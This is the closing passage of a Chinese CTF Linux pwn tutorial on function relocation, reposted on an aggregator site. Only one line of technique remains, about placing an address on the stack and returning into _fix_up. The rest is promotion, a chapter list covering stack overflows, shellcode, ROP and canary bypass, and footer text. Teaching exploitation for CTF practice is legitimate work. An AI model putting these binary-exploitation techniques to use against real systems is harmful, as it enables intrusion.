把這行指令地址放到棧上，用ret就可以跳進_fix_up.現在我們需要的東西都齊了，只要把它們組裝起來，pwn it!

?課后例題和練習題非常重要，小伙伴請務必進行練習，進群后管理員會給大家發放哦。

練習題獲取入口

新來的朋友如果想要了解其他的必備技能和實用工具，可以點擊菜單欄中的入門錦囊查看相關內容：

文章素材來源于i春秋社區

●?入門教程第一章：環境配置

●?入門教程第二章：棧溢出基礎

●?入門教程第三章：ShellCode

●?入門教程第四章：ROP技術

●?入門教程第五章：調整棧幀的技巧

●?入門教程第六章：利用漏洞獲取libc

●?入門教程第七章：格式化字符串漏洞

●?入門教程第八章：PIE與bypass思路

●?入門教程第九章：SROP

●?入門教程第十章：stack canary與繞過的思路

●?入門教程第十一章：針對函數重定位流程的相關測試

熱門回顧

/陷阱

安全意識必不可少

/培訓

滲透測試必備知識

End

i春秋官方公眾號為大家提供

前沿的網絡安全技術

簡單易懂的實用工具

緊張刺激的安全競賽

還有網絡安全大講堂

更多技能等你來解鎖

總結

以上是生活随笔為你收集整理的c# 定位内存快速增长_CTF丨Linux Pwn入门教程：针对函数重定位流程的相关测试（下）...的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。